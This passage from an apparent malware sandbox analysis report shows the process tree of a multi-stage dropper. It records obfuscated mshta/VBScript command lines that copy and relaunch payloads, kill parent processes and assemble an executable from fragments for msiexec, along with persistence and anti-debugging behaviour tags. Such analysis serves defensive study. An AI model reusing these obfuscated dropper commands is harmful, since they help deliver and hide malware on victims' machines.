                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              PID:2324
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                PID:4644
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                    PID:4596
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                  PID:3628
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5325332.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5325332.exe"
                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    PID:5164
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8590031.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8590031.exe"
                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    PID:5452
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\198652.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\198652.exe"
                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    PID:5748
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5718271.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5718271.exe"
                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    PID:6016
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2620710.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2620710.exe"
                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    PID:5208
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse ( CreaTEOBjeCt ( "WsCRiPT.sHelL" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\Users\Admin\AppData\Roaming\2620710.exe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if """" == """" for %N In (""C:\Users\Admin\AppData\Roaming\2620710.exe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )
                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                        PID:5628
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Roaming\2620710.exe" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "" == "" for %N In ("C:\Users\Admin\AppData\Roaming\2620710.exe" ) do taskkill -IM "%~nxN" /F
                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                            PID:5920
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                              taskkill -IM "2620710.exe" /F
                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                              PID:6808
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8855578.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8855578.exe"
                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                        PID:3348
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:2120
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3561761.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3561761.exe"
                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:5316
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      PID:4996
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      PID:1160
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                        PID:3220
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:5396
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                        PID:4732
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:1208
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                            PID:2860
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                PID:4280
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                                                                                                                                  ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  PID:4472
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                      PID:4448
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                                                          PID:5328
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                                          PID:6752
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                                                                              PID:2064
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6480
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5172
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                    msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5904
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                PID:5380
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                          PID:2112
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 800
                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                            PID:5688
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 804
                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                            PID:6080
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 788
                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                            PID:5624
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 824
                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                            PID:5896
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                          PID:5024
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                          PID:1184
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 1184 -s 1508
                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                            PID:6128
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                          PID:1876
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                            PID:5988
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                              PID:5904
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1ec,0x1f0,0x1f4,0x1c8,0x1f8,0x7ffb1a7bdec0,0x7ffb1a7bded0,0x7ffb1a7bdee0
                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                PID:5900
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1532 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                PID:5640
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --mojo-platform-channel-handle=2076 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                PID:7208
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --mojo-platform-channel-handle=1712 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                PID:7200
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2128 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                PID:7448
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2676 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                PID:7440
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3188 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6172
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --mojo-platform-channel-handle=3208 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5412
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --mojo-platform-channel-handle=3516 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                                      PID:3576
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --mojo-platform-channel-handle=2020 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                                      PID:7708
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --mojo-platform-channel-handle=1808 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1304
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1512,14228628311674263049,2201478283222287619,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_973842454" --mojo-platform-channel-handle=2792 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4356
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Sun0351a0558292.exe
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:1172
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun0351a0558292.exe
                                                                                                                                                                                                                                                                                                                                                  Sun0351a0558292.exe
                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
